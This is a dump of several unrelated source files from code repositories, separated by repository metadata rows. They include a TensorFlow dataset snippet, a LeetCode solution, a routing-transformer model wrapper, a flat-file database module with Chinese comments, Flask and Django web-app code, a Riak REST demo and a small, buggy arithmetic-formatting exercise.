dataset = dataset.repeat(None) # Infinite iterations: let experiment determine num_epochs
dataset = dataset.batch(64)
iterator = dataset.make_one_shot_iterator()
# iterator = dataset.make_initializable_iterator()
features, labels, name = iterator.get_next()
# sess.run(iterator)
for i in range(10):
d_l = sess.run(name)
print(d_l[0])
# print(d_n[0])
# plt.imshow(d_f[0])
# plt.show()
# print(len(sess.run(features)))
| [
"you359@koreatech.ac.kr"
] | you359@koreatech.ac.kr |
84943acbf7b7b989ac08e4c3d173d53799243119 | 2dd560dc468af0af4ca44cb4cd37a0b807357063 | /Leetcode/1170. Compare Strings by Frequency of the Smallest Character/solution2.py | f55713f52de924d420434c926569d1d9fb130de7 | [
"MIT"
] | permissive | hi0t/Outtalent | 460fe4a73788437ba6ce9ef1501291035c8ff1e8 | 8a10b23335d8e9f080e5c39715b38bcc2916ff00 | refs/heads/master | 2023-02-26T21:16:56.741589 | 2021-02-05T13:36:50 | 2021-02-05T13:36:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 255 | py | from bisect import bisect
class Solution:
def numSmallerByFrequency(self, queries: List[str], words: List[str]) -> List[int]:
f = sorted([w.count(min(w)) for w in words])
return [len(f) - bisect(f, q.count(min(q))) for q in queries]
| [
"info@crazysquirrel.ru"
] | info@crazysquirrel.ru |
932f0f3ca464a0e327e0dcff6fe1f74ce0621071 | e10a6d844a286db26ef56469e31dc8488a8c6f0e | /routing_transformer/routing_tf_api.py | 62feaeaa11136632e25caf46ffb158383e6714e4 | [
"Apache-2.0",
"CC-BY-4.0"
] | permissive | Jimmy-INL/google-research | 54ad5551f97977f01297abddbfc8a99a7900b791 | 5573d9c5822f4e866b6692769963ae819cb3f10d | refs/heads/master | 2023-04-07T19:43:54.483068 | 2023-03-24T16:27:28 | 2023-03-24T16:32:17 | 282,682,170 | 1 | 0 | Apache-2.0 | 2020-07-26T15:50:32 | 2020-07-26T15:50:31 | null | UTF-8 | Python | false | false | 7,727 | py | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pdb
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
tf.get_logger().setLevel('ERROR')
from tensor2tensor import models
from tensor2tensor import problems
from tensor2tensor.utils import trainer_lib
from tensor2tensor.utils import hparams_lib
from tensor2tensor.utils import registry
from tensor2tensor.utils import metrics
from tensor2tensor.data_generators import text_encoder
from tensor2tensor.data_generators import problem
from routing_transformer.problems import pg19
from tensorflow.compat.v1 import estimator as tf_estimator
from tqdm import tqdm
from routing_transformer.sparse_transformer import SparseTransformer
import numpy as np
import random
from scipy.special import log_softmax
VOCAB_PATH = "/mnt/nfs/work1/miyyer/simengsun/in-book-retrieval/RT-data/vocab.pg19_length8k.32768.subwords"
HPARAMS_PATH = "/mnt/nfs/work1/miyyer/simengsun/in-book-retrieval/RT-models/rt-checkpoint/hparams.json"
CKPT_PATH = "/mnt/nfs/work1/miyyer/simengsun/in-book-retrieval/RT-models/rt-checkpoint/ckpt-3530000"
MAX_SEQUENCE_LENGTH = 8192
class SparseTransformerWrapper(object):
def __init__(self, max_seq_length=None):
# Load hyperparameters
self.max_seq_length = max_seq_length or MAX_SEQUENCE_LENGTH
# Needed since RT uses blocks of size 256
assert self.max_seq_length % 256 == 0
hparams = hparams_lib.create_hparams_from_json(HPARAMS_PATH)
hparams.use_tpu = False
hparams = zero_dropout(hparams)
# Build TF1 graph of model
sptf_model = SparseTransformer(hparams, tf_estimator.ModeKeys.EVAL)
self.input_nodes = {
"targets": tf.placeholder(tf.int32, [None, self.max_seq_length])
}
self.output_nodes = sptf_model.body(self.input_nodes)
# Map the checkpoint variables to the graph
init_from_checkpoint(CKPT_PATH, variable_prefix="sparse_transformer/body")
# create a session object, and actually initialize the graph
self.sess = tf.Session()
self.sess.run(tf.global_variables_initializer())
self.encoder = text_encoder.SubwordTextEncoder(VOCAB_PATH)
def forward(self, sentences, encode_sentences=True, relevant_subsequences=None):
encoded_sents = []
encoded_seqs_no_pad = []
if encode_sentences:
for sent in sentences:
encoded = []
for line in sent.split("\n"):
new_tokens = self.encoder.encode(line.strip())
if len(encoded) + len(new_tokens) >= self.max_seq_length:
break
encoded.extend(new_tokens)
encoded.append(text_encoder.EOS_ID)
encoded_seqs_no_pad.append(encoded)
# pad shorter sequences to the full length
encoded = encoded + [text_encoder.PAD_ID for _ in range(self.max_seq_length - len(encoded))]
assert len(encoded) == self.max_seq_length
encoded_sents.append(encoded)
else:
# assume sentences are encoded, pad/truncate them
for sent in sentences:
sent = sent[:self.max_seq_length]
encoded_seqs_no_pad.append(sent)
sent = sent + [text_encoder.PAD_ID for _ in range(self.max_seq_length - len(sent))]
encoded_sents.append(sent)
feed_dict = {
self.input_nodes["targets"]: np.array(encoded_sents)
}
outputs = self.sess.run(self.output_nodes, feed_dict=feed_dict)
return_outputs = {
"logits": np.squeeze(outputs[0], axis=(2, 3)),
"loss": outputs[1]["training"],
"encoded_seqs_no_pad": encoded_seqs_no_pad
}
if relevant_subsequences is not None:
for i, rss in enumerate(relevant_subsequences):
encoded_subseq = self.encoder.encode(rss)
positions = find_sub_list(encoded_subseq, encoded_sents[i])
misaligned_prefix_length = 0
while positions is None:
misaligned_prefix_length += 1
encoded_subseq = encoded_subseq[1:]
positions = find_sub_list(encoded_subseq, encoded_sents[i])
start, end = positions[-1]
relevant_logits = return_outputs["logits"][i][start:end]
log_probs = log_softmax(relevant_logits, axis=1)
gold_log_probs = [lp[index] for index, lp in zip(encoded_subseq, log_probs)]
return_outputs["subseq_log_loss"] = -1 * np.mean(gold_log_probs)
return_outputs["misaligned_prefix_length"] = misaligned_prefix_length
return return_outputs
def close(self):
self.sess.close()
def find_sub_list(sl, l):
"""Find sub-string, so as to be able to compute ppl of a sub-string."""
sll=len(sl)
matches = []
for ind in (i for i,e in enumerate(l) if e == sl[0]):
if l[ind:ind + sll] == sl:
matches.append(
(ind, ind + sll)
)
if matches:
return matches
def zero_dropout(hparams):
hparams.input_dropout = 0.0
hparams.dropout = 0.0
hparams.relu_dropout = 0.0
hparams.attention_dropout = 0.0
hparams.layer_prepostprocess_dropout = 0.0
return hparams
def log_variables(name, var_names):
tf.logging.info("%s (%d total): %s", name, len(var_names),
random.sample(var_names, min(len(var_names), 5)))
def init_from_checkpoint(checkpoint_path,
checkpoint_prefix=None,
variable_prefix=None,
target_variables=None):
"""Initializes all of the variables using `init_checkpoint."""
tf.logging.info("Loading variables from %s", checkpoint_path)
checkpoint_variables = {
name: name for name, _ in tf.train.list_variables(checkpoint_path) if "Adafactor" not in name
}
if target_variables is None:
target_variables = tf.trainable_variables()
target_variables = {var.name.split(":")[0]: var for var in target_variables}
if checkpoint_prefix is not None:
checkpoint_variables = {
checkpoint_prefix + "/" + name: varname
for name, varname in checkpoint_variables.items()
}
if variable_prefix is not None:
target_variables = {
variable_prefix + "/" + name: var
for name, var in target_variables.items()
}
checkpoint_var_names = set(checkpoint_variables.keys())
target_var_names = set(target_variables.keys())
intersected_var_names = target_var_names & checkpoint_var_names
assignment_map = {
checkpoint_variables[name]: target_variables[name]
for name in intersected_var_names
}
tf.train.init_from_checkpoint(checkpoint_path, assignment_map)
log_variables("Loaded variables", intersected_var_names)
log_variables("Uninitialized variables", target_var_names - checkpoint_var_names)
log_variables("Unused variables", checkpoint_var_names - target_var_names)
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
8ef782168d9426a05d7c3eba58168c3c1960a475 | 8e0c257beaefd47b8906901c8359c7748cc91bdf | /core/dblite/dblite.py | 48d24561f72eb795d5435fd2ae24080da4686f85 | [] | no_license | Reqin/tft_rebuild | fc2d917e7bb4ff097d7473da8d5110eddca9ebc4 | 2745d3e1ab84b5931ab018e49f7eb245304d8109 | refs/heads/master | 2022-11-27T23:28:51.421917 | 2020-07-26T10:53:25 | 2020-07-26T10:53:25 | 279,995,549 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,032 | py | """
@author: Reqin
@desc: 这是此项目的数据驱动程序。
除了用于程序初始化的配置信息之外,所有文本数据的增、删、查、改必须通过这个这个程序进行。
此程序的数据规范如下:
1. 此程序读取 .db 文件
2. 每一个 .db 文件里包含的数据必须是同一类数据,每一类数据的用途必须严格一致
3. .db 文件只存储文本数据,且文本数据的意义表征只能是严格的文本,不用于解码等其他操作
4. .db 文件的第一行是此文件中所有数据的索引,且索引必须为非数字,且不能重复
5. .db 文件没有严格意义上的数据纵向排列,不能存在两行相同的数据,数据的重复不会被读取,也无法写入重复的数据
6. .db 文件字段之间使用 英文标点冒号 隔开用于表征和识别字段数据
7. .db 文件现阶段只进行小文件操作,使用者需要避免 .db 文件过大
8. 为了更好的鲁棒性 尽量使得每个字段中的值简单化是一个明智的选择
"""
import os
import copy
import collections
from core.filePipe.pipe import read_all, add_line
from core.filePipe.pipe import __touch as touch
from core.filePipe.pipe import __clear as clear
from lib import logger
from functools import wraps
from lib import config_init, config_parser
import shutil
def is_empty_table(func):
@wraps(func)
def wrapper(*args, **kwargs):
args = copy.copy(args)
table = args[0]
if not table.fields:
logger.info("执行中止,不能对空表进行此操作,表名:{},中断参数:{} -- {},".format(table.name, args, kwargs))
return -1
else:
return func(*args, **kwargs)
return wrapper
class Table:
def __init__(self, config):
self.index = config.index
self.name = config.default_table_name
self.path = config.path
self.swap_file_suffix = config.swap_file_suffix
self.swap_path = self.path + self.swap_file_suffix
self.metadata = None
self.encode_type = list
self.decode_type = str
self.fields = []
self.data = []
self.__load_data()
def __load_data(self):
self.file_data = read_all(self.path).strip().split(os.linesep)
self.file_fields = self.file_data[0]
if not self.file_fields:
logger.info("读取到空表 path:{}".format(self.path))
else:
fields = self.__decode(self.file_fields)
self.fields = fields
if not self.fields:
return
self.metadata = collections.namedtuple("TABLE", self.fields)
self.encode_type = self.metadata
for file_line in self.file_data:
data_line = self.__decode(file_line)
if len(self.fields) == len(data_line):
new_data = self.metadata(*data_line)
if new_data in self.data:
logger.warning("表中存在重复的数据,表:{} 数据:{}".format(self.name, data_line))
else:
self.data.append(new_data)
else:
logger.warning("表数据异常,表:{},数据:{}".format(self.name, file_line))
def refresh(self):
self.__load_data()
# 将每一行的文件数据转为数据表数据
def __encode(self, data):
if not isinstance(data, self.encode_type):
logger.error("数据格式错误,数据:{},标准格式:{}".format(data, self.encode_type))
return False
else:
line = "{}".format(data[0])
for one in data[1:]:
line += "!&:{}".format(one)
return line
# 将一个数据表记录转为数据表文件标准格式
def __decode(self, line):
if not isinstance(line, self.decode_type):
logger.error("数据格式错误,数据:{},标准格式:{}".format(line, self.decode_type))
return False
else:
return line.split("!&:")
def __update_file(self):
touch(self.swap_path)
clear(self.swap_path)
for data_line in self.data:
file_line = self.__encode(data_line)
add_line(self.swap_path, file_line)
try:
os.remove(self.path)
os.rename(self.swap_path, self.path)
except Exception as e:
logger.critical("更新失败,数据文件时出现异常,文件路径:{},交换路径:{}".format(self.path, self.swap_path))
def get_fields(self):
return self.fields
def create(self, fields):
if self.data:
logger.info("失败,无法在未清空的表中创建新表,表文件路径:{}".format(self.path))
return False
self.fields = fields
self.__load_data()
# exit()
# self.data = []
if self.insert(fields, fields):
logger.info("成功,已创建表,表字段:{}".format(fields))
@is_empty_table
def clear(self):
if clear(self.path):
logger.info("成功,已清空表,表文件路径:{}".format(self.path))
self.file_data = []
self.data = []
self.encode_type = list
return True
else:
logger.info("失败,未清空表,文件异常,表文件路径:{}".format(self.path))
return False
@is_empty_table
def insert(self, fields, values):
if not isinstance(fields, list) or not isinstance(values, list):
logger.error("数据格式错误,插入失败,标准格式:{} 未能和字段:{} 数据:{} 完全匹配".format(list, fields, values))
return 0
if len(fields) != len(values):
logger.error("数据长度错误,插入失败,字段:{} 未能和值:{} 完全匹配".format(fields, values))
return 0
if fields != self.fields:
logger.error("数据字段错误,插入失败,标准字段:{} 未能和字段:{} 完全匹配".format(self.fields, fields))
return 0
new_data = self.metadata(*values)
if new_data in self.data:
logger.warning("不允许数据重复,数据:{} 已存在".format(values))
return 0
else:
line = self.__encode(new_data)
if line:
add_line(self.path, line)
else:
logger.warning("数据编码失败,数据:{}".format(new_data))
return False
self.data.append(new_data)
logger.info("成功,插入数据,表索引:{},数据:{}".format(self.index, new_data))
return True
# noinspection PyArgumentList
@is_empty_table
def update(self, trait, change):
old_records = self.retrieve(*trait)
if not old_records:
logger.warning("警告,不存在旧记录:{}".format(old_records))
return None
new_records = []
for old_record in old_records:
new_value = []
for field in self.fields:
if field not in change.keys():
new_value.append(old_record.__getattribute__(field))
else:
new_value.append(change[field])
new_record = self.metadata(*new_value)
new_records.append(new_record)
self.data[self.data.index(old_record)] = new_record
if new_records != old_records:
self.__update_file()
return new_records
else:
logger.info("已动作,数据无变化,旧记录:{},新记录:{}".format(old_records, new_records))
return 0
@is_empty_table
def retrieve(self, field, value):
records = []
if field not in self.fields:
logger.warning("在字段 {} 中查询不存在的字段: {}".format(self.fields, field))
else:
records = [record for record in self.data if record.__getattribute__(field) == value]
if not records:
logger.info("字段 {} 中未查询到数据: {}".format(field, value))
return records
@is_empty_table
def delete(self, namedtuple_item):
if namedtuple_item in self.data:
self.data.remove(namedtuple_item)
self.__update_file()
logger.info("成功,删除表数据,表:{},数据:{}".format(self.index, namedtuple_item))
else:
logger.warning("失败,尝试删除不存在的数据,表:{},数据:{}".format(self.index, namedtuple_item))
@is_empty_table
def all(self):
return self.data[1:]
def get_table(db, index):
keys = index.split(".")
# 切换数据表所在的数据库
for key in keys[:-1]:
if isinstance(db, DB):
if key in db.dbs:
db = db.dbs[key]
# logger.info("成功,已读取数据库,索引:{}".format(db.index))
else:
logger.error("不存在的数据库索引:{}".format(index))
return False
else:
logger.critical("错误!数据异常,数据:{} 与 标准数据库数据{} 类型不匹配".format(db, DB))
return False
table_name = keys[-1]
if table_name in db.dbs.keys():
table = db.dbs[table_name]
if isinstance(table, Table):
logger.info("成功,已读取数据表,索引:{}".format(table.index))
return table
else:
logger.critical("错误!数据异常,数据:{} 与 标准数据表数据{} 类型不匹配".format(table, Table))
return False
else:
logger.error("不存在的数据表索引:{}".format(index))
return None
pass
def set_table(db, index, new_table):
if not isinstance(new_table, Table):
logger.critical("错误!数据异常,数据:{} 与 标准数据表数据{} 类型不匹配".format(new_table, Table))
return
keys = index.split(".")
# 切换数据表所在的数据库
for key in keys[:-1]:
if isinstance(db, DB):
if key in db.dbs:
db = db.dbs[key]
# logger.info("成功,已读取数据库,索引:{}".format(db.index))
else:
logger.error("不存在的数据库索引:{}".format(index))
return False
else:
logger.critical("错误!数据异常,数据:{} 与 标准数据库数据{} 类型不匹配".format(db, DB))
return False
table_name = keys[-1]
if table_name in db.dbs.keys():
old_table = db.dbs[table_name]
if isinstance(old_table, Table):
logger.info("成功,已读取数据表,索引:{}".format(old_table.index))
db.dbs[table_name] = new_table
return True
else:
logger.critical("错误!数据异常,数据:{} 与 标准数据表数据{} 类型不匹配".format(old_table, Table))
return False
else:
logger.error("不存在的数据表索引:{}".format(index))
return False
def auto_get_table(func):
@wraps(func)
def wrapper(*args, **kwargs):
args = copy.copy(args)
db = args[0]
index = args[1]
table = get_table(db, index)
if isinstance(table, Table):
return func(*args, **kwargs, table=table)
else:
return -1
return wrapper
class DB:
type = {
1: "DB",
2: "TABLE"
}
def __init__(self, config):
self.config = copy.deepcopy(config)
self.index = self.config.index
self.__path = config.path
self.__suffix = config.suffix
self.name = config.default_db_name
self.dbs = {}
self.__load_data()
def __load_data(self):
config = copy.deepcopy(self.config)
db_index = config.index
for item in os.listdir(self.__path):
path = os.path.join(self.__path, item)
config.path = path
config.default_db_name = item
if os.path.isdir(path):
if not db_index:
db_index = item
else:
db_index = "{}.{}".format(db_index, item)
config.index = db_index
self.dbs[item] = DB(config)
logger.info("成功,已加载库,索引:{}".format(db_index))
else:
name, suffix = os.path.splitext(item)
if suffix == self.__suffix:
config.default_table_name = name
table_index = "{}.{}".format(db_index, name)
config.index = table_index
self.dbs[name] = Table(config)
logger.info("成功,已加载表,索引:{}".format(table_index))
@auto_get_table
def insert(self, index, fields, values, table=None):
del index
return table.insert(fields, values)
@auto_get_table
def update(self, index, trait, change, table=None):
del index
return table.update(trait, change)
@auto_get_table
def refresh_table(self, index, table=None):
new_table = table.refresh()
set_table(self, index, new_table)
return True
@auto_get_table
def get_fields(self, index, table=None):
del index
return table.get_fields()
@auto_get_table
def retrieve(self, index, field, value, table=None):
del index
return table.retrieve(field, value)
@auto_get_table
def delete(self, index, namedtuple_item, table=None):
return table.delete(namedtuple_item)
@auto_get_table
def all_table_data(self, index, table=None):
del index
return table.all()
def generate_table(self, index, fields):
path = self.__path
path_trace = index.split(".")
for trace in path_trace:
path = os.path.join(path, trace)
path = path + self.__suffix
if not os.path.exists(path):
logger.info("执行中,未存在的文件,正在创建文件,路径:{}".format(path))
touch(path)
self.__load_data()
self.clear_table(index)
self.init_table(index, fields)
return index
@auto_get_table
def clear_table(self, index, table=None):
del index
return table.clear()
@auto_get_table
def init_table(self, index, fields, table=None):
del index
return table.create(fields)
def copy(self, index_pairs):
for index_pair in index_pairs:
source_table = get_table(self, index_pair[0])
target_table = get_table(self, index_pair[1])
shutil.copy(source_table.path, target_table.path)
self.__load_data()
return
db_config = config_parser(config_init.db.path)
default_db_engine = DB(db_config)
| [
"reqinfeng2008@gmail.com"
] | reqinfeng2008@gmail.com |
175f152d05ef49c12354b7ffb06d8f723803c2c9 | 9246c85dd13e52719a97fac2769bf4cc387e34aa | /app/main/views.py | 352d9ddb2a8c2986af19f419937af9ca6c85d687 | [] | no_license | Heersin/flask-quick-scaffold | 5d8add1cd8178a2ab6284bf08e65ae32dc0e2d71 | 31ab2b80b41d9248b495aacfbbb8ddb2ca2d426f | refs/heads/master | 2021-04-07T04:16:28.240400 | 2020-04-17T17:36:45 | 2020-04-17T17:36:45 | 248,645,232 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,218 | py | from flask import render_template, redirect, request, url_for, flash
from .forms import ClientForm
from . import main, mychart
import os
from app.models import Client
@main.route('/')
def root():
return redirect(url_for('main.index'))
@main.route('/index')
def index():
return render_template('main/new_index.html')
@main.route('/report/<mode>', methods=['GET', 'POST'])
def report(mode):
REMOTE_HOST="https://pyecharts.github.io/assets/js"
liquid = mychart.liquid.render_embed()
parallel = mychart.parallel.render_embed()
heatmap = mychart.heatmap.render_embed()
print(os.getcwd())
if request.method == 'POST':
return redirect(url_for('main.index'))
elif request.method == 'GET':
if mode == '1':
return render_template('main/new_report.html',chart=liquid, host=REMOTE_HOST)
elif mode == '2':
return render_template('main/new_report.html',chart=parallel, host=REMOTE_HOST)
elif mode == '3':
return render_template('main/new_report.html',chart=heatmap, host=REMOTE_HOST)
else:
return render_template('errors/404.html')
else:
return render_template('errors/404.html')
| [
"muse208@qq.com"
] | muse208@qq.com |
be0fa3968a416b2196ac451acf973eb9d1af14be | 329bc425fb085596bf2bc385abcb8e8d581a64b8 | /Simple-eval.py | 577a171307b1935c86c9fbdf5e82e7932df0ebd4 | [] | no_license | aoeu256/dumb-pythonproblems | c9929dafe4d0fcff5bb08f2b4bab3ebfd7f0555e | 5955fd0a1b593e0cf8c481404405eed071ed93b1 | refs/heads/main | 2023-04-11T19:51:25.004086 | 2021-05-03T13:43:48 | 2021-05-03T13:43:48 | 363,941,907 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 629 | py | def arithmetic_arranger(problems, answer=False):
outputS = [[], [], [], []]
if len(problems) <= 5: return "Error: Too many problems."
for prob in problems:
[a, op, b] = prob.split(" ")
assert op in '+-'
assert a.isdigit()
assert b.isdigit()
outputS[0].append(a)
line2 = op + ' ' + b
outputS[1].append(line2)
outputS[2].append('-'*len(line2))
if answer:
op = {'+':lambda a,b: a+b, '-':lambda a,b: a-b}[op]
line3 = str(op(int(a), int(b)))
outputS[3].append(line3)
arranged_problems = '\n'.join(outputS)
return arranged_problems
| [
"noreply@github.com"
] | aoeu256.noreply@github.com |
5bed9df02107cc457888e09dc4a4f4012d2b9405 | 4f6beba19a2aad878b04ef523495a591849a5097 | /riak/mian.py | 2057e0ba6848a84f22d344805cf09fc1deeb7997 | [] | no_license | zofiamaszlanka/nbd | 9ffad05e70e167a0b336a0d8e9abbf1527afd2b8 | d0cd9043a46c6e20d91321c4a0bd88282222f74d | refs/heads/main | 2023-06-02T10:12:20.467008 | 2021-06-27T22:21:39 | 2021-06-27T22:21:39 | 380,843,052 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 683 | py | import requests
URL = 'http://localhost:8098/buckets/s22555/keys/'
print("\ncreate: ")
shoes = {'brand': 'Spraindi', 'size': 37, 'price': 99}
print(requests.post(URL + "sprandi", data=shoes))
print("\nget: ")
print(requests.get(URL + "sprandi"))
print(requests.get(URL + "sprandi").text)
print("\nupdate: ")
shoes_updated = {'brand': 'Spraindi', 'size': 37, 'price': 88}
print(requests.put(URL + "sprandi", data=shoes_updated))
print("\nget: ")
print(requests.get(URL + "sprandi"))
print(requests.get(URL + "sprandi").text)
print("\ndelete: ")
print(requests.delete(URL + "sprandi"))
print("\nget: ")
print(requests.get(URL + "sprandi"))
print(requests.get(URL + "sprandi").text) | [
"s22555@pjwstk.edu.pl"
] | s22555@pjwstk.edu.pl |
1496c6926500134828feb54cde9f2ff4147b1331 | 1ea77105dc42b6f7103ba93d00f981c546a10c63 | /saas/web/models.py | e338c9db3c66b89f4810296e7c4b14074f0eba42 | [] | no_license | cat-fans/web_back | 23845ac5b73cf5ad99dcfd53c1b38d068dc8c9c9 | 1c405be433159223bf8e2f35aaf40d934b99ae9b | refs/heads/master | 2023-03-02T21:57:15.888633 | 2021-02-04T22:07:59 | 2021-02-04T22:07:59 | 331,644,076 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,845 | py | from django.db import models
class UserInfo(models.Model):
username = models.CharField(verbose_name='用户名', max_length=32, db_index=True) # db_index=True 索引
email = models.EmailField(verbose_name='邮箱', max_length=32)
mobile_phone = models.CharField(verbose_name='手机号', max_length=32)
password = models.CharField(verbose_name='密码', max_length=32)
# price_policy = models.ForeignKey(verbose_name='价格策略', to='PricePolicy', null=True, blank=True)
def __str__(self):
return self.username
class PricePolicy(models.Model):
""" 价格策略 """
category_choices = (
(1, '免费版'),
(2, '收费版'),
(3, '其他'),
)
category = models.SmallIntegerField(verbose_name='收费类型', default=2, choices=category_choices)
title = models.CharField(verbose_name='标题', max_length=32)
price = models.PositiveIntegerField(verbose_name='价格') # 正整数
project_num = models.PositiveIntegerField(verbose_name='项目数')
project_member = models.PositiveIntegerField(verbose_name='项目成员数')
project_space = models.PositiveIntegerField(verbose_name='单项目空间', help_text='G')
per_file_size = models.PositiveIntegerField(verbose_name='单文件大小', help_text="M")
create_datetime = models.DateTimeField(verbose_name='创建时间', auto_now_add=True)
class Transaction(models.Model):
""" 交易记录 """
status_choice = (
(1, '未支付'),
(2, '已支付')
)
status = models.SmallIntegerField(verbose_name='状态', choices=status_choice)
order = models.CharField(verbose_name='订单号', max_length=64, unique=True) # 唯一索引
user = models.ForeignKey(verbose_name='用户', to='UserInfo')
price_policy = models.ForeignKey(verbose_name='价格策略', to='PricePolicy')
count = models.IntegerField(verbose_name='数量(年)', help_text='0表示无限期')
price = models.IntegerField(verbose_name='实际支付价格')
start_datetime = models.DateTimeField(verbose_name='开始时间', null=True, blank=True)
end_datetime = models.DateTimeField(verbose_name='结束时间', null=True, blank=True)
create_datetime = models.DateTimeField(verbose_name='创建时间', auto_now_add=True)
class Project(models.Model):
""" 项目表 """
COLOR_CHOICES = (
(1, "#56b8eb"), # 56b8eb
(2, "#f28033"), # f28033
(3, "#ebc656"), # ebc656
(4, "#a2d148"), # a2d148
(5, "#20BFA4"), # #20BFA4
(6, "#7461c2"), # 7461c2,
(7, "#20bfa3"), # 20bfa3,
)
name = models.CharField(verbose_name='项目名', max_length=32)
color = models.SmallIntegerField(verbose_name='颜色', choices=COLOR_CHOICES, default=1)
desc = models.CharField(verbose_name='项目描述', max_length=255, null=True, blank=True)
use_space = models.BigIntegerField(verbose_name='项目已使用空间', default=0, help_text='字节')
star = models.BooleanField(verbose_name='星标', default=False)
join_count = models.SmallIntegerField(verbose_name='参与人数', default=1)
creator = models.ForeignKey(verbose_name='创建者', to='UserInfo')
create_datetime = models.DateTimeField(verbose_name='创建时间', auto_now_add=True)
bucket = models.CharField(verbose_name='cos桶', max_length=128)
region = models.CharField(verbose_name='cos区域', max_length=32)
# 查询:可以省事;
# 增加、删除、修改:无法完成
# project_user = models.ManyToManyField(to='UserInfo',through="ProjectUser",through_fields=('project','user'))
class ProjectUser(models.Model):
""" 项目参与者 """
project = models.ForeignKey(verbose_name='项目', to='Project')
user = models.ForeignKey(verbose_name='参与者', to='UserInfo')
star = models.BooleanField(verbose_name='星标', default=False)
create_datetime = models.DateTimeField(verbose_name='加入时间', auto_now_add=True)
class Wiki(models.Model):
project = models.ForeignKey(verbose_name='项目', to='Project')
title = models.CharField(verbose_name='标题', max_length=32)
content = models.TextField(verbose_name='内容')
depth = models.IntegerField(verbose_name='深度', default=1)
# 子关联
parent = models.ForeignKey(verbose_name='父文章', to="Wiki", null=True, blank=True, related_name='children')
def __str__(self):
return self.title
class FileRepository(models.Model):
""" 文件库 """
project = models.ForeignKey(verbose_name='项目', to='Project')
file_type_choices = (
(1, '文件'),
(2, '文件夹')
)
file_type = models.SmallIntegerField(verbose_name='类型', choices=file_type_choices)
name = models.CharField(verbose_name='文件夹名称', max_length=32, help_text="文件/文件夹名")
key = models.CharField(verbose_name='文件储存在COS中的KEY', max_length=128, null=True, blank=True)
# int类型最大表示的数据
file_size = models.BigIntegerField(verbose_name='文件大小', null=True, blank=True, help_text='字节')
file_path = models.CharField(verbose_name='文件路径', max_length=255, null=True,
blank=True) # https://桶.cos.ap-chengdu/....
parent = models.ForeignKey(verbose_name='父级目录', to='self', related_name='child', null=True, blank=True)
update_user = models.ForeignKey(verbose_name='最近更新者', to='UserInfo')
update_datetime = models.DateTimeField(verbose_name='更新时间', auto_now=True)
class Issues(models.Model):
""" 问题 """
project = models.ForeignKey(verbose_name='项目', to='Project')
issues_type = models.ForeignKey(verbose_name='问题类型', to='IssuesType')
module = models.ForeignKey(verbose_name='模块', to='Module', null=True, blank=True)
subject = models.CharField(verbose_name='主题', max_length=80)
desc = models.TextField(verbose_name='问题描述')
priority_choices = (
("danger", "高"),
("warning", "中"),
("success", "低"),
)
priority = models.CharField(verbose_name='优先级', max_length=12, choices=priority_choices, default='danger')
# 新建、处理中、已解决、已忽略、待反馈、已关闭、重新打开
status_choices = (
(1, '新建'),
(2, '处理中'),
(3, '已解决'),
(4, '已忽略'),
(5, '待反馈'),
(6, '已关闭'),
(7, '重新打开'),
)
status = models.SmallIntegerField(verbose_name='状态', choices=status_choices, default=1)
assign = models.ForeignKey(verbose_name='指派', to='UserInfo', related_name='task', null=True, blank=True)
attention = models.ManyToManyField(verbose_name='关注者', to='UserInfo', related_name='observe', blank=True)
start_date = models.DateField(verbose_name='开始时间', null=True, blank=True)
end_date = models.DateField(verbose_name='结束时间', null=True, blank=True)
mode_choices = (
(1, '公开模式'),
(2, '隐私模式'),
)
mode = models.SmallIntegerField(verbose_name='模式', choices=mode_choices, default=1)
parent = models.ForeignKey(verbose_name='父问题', to='self', related_name='child', null=True, blank=True,
on_delete=models.SET_NULL)
creator = models.ForeignKey(verbose_name='创建者', to='UserInfo', related_name='create_problems')
create_datetime = models.DateTimeField(verbose_name='创建时间', auto_now_add=True)
latest_update_datetime = models.DateTimeField(verbose_name='最后更新时间', auto_now=True)
def __str__(self):
return self.subject
class Module(models.Model):
""" 模块(里程碑)"""
project = models.ForeignKey(verbose_name='项目', to='Project')
title = models.CharField(verbose_name='模块名称', max_length=32)
def __str__(self):
return self.title
class IssuesType(models.Model):
""" 问题类型 例如:任务、功能、Bug """
PROJECT_INIT_LIST = ["任务", '功能', 'Bug']
title = models.CharField(verbose_name='类型名称', max_length=32)
project = models.ForeignKey(verbose_name='项目', to='Project')
def __str__(self):
return self.title
class IssuesReply(models.Model):
""" 问题回复"""
reply_type_choices = (
(1, '修改记录'),
(2, '回复')
)
reply_type = models.IntegerField(verbose_name='类型', choices=reply_type_choices)
issues = models.ForeignKey(verbose_name='问题', to='Issues')
content = models.TextField(verbose_name='描述')
creator = models.ForeignKey(verbose_name='创建者', to='UserInfo', related_name='create_reply')
create_datetime = models.DateTimeField(verbose_name='创建时间', auto_now_add=True)
reply = models.ForeignKey(verbose_name='回复', to='self', null=True, blank=True)
class ProjectInvite(models.Model):
""" 项目邀请码 """
project = models.ForeignKey(verbose_name='项目', to='Project')
code = models.CharField(verbose_name='邀请码', max_length=64, unique=True)
count = models.PositiveIntegerField(verbose_name='限制数量', null=True, blank=True, help_text='空表示无数量限制')
use_count = models.PositiveIntegerField(verbose_name='已邀请数量', default=0)
period_choices = (
(30, '30分钟'),
(60, '1小时'),
(300, '5小时'),
(1440, '24小时'),
)
period = models.IntegerField(verbose_name='有效期', choices=period_choices, default=1440)
create_datetime = models.DateTimeField(verbose_name='创建时间', auto_now_add=True)
creator = models.ForeignKey(verbose_name='创建者', to='UserInfo', related_name='create_invite')
| [
"qaq_cat_fans@163.com"
] | qaq_cat_fans@163.com |
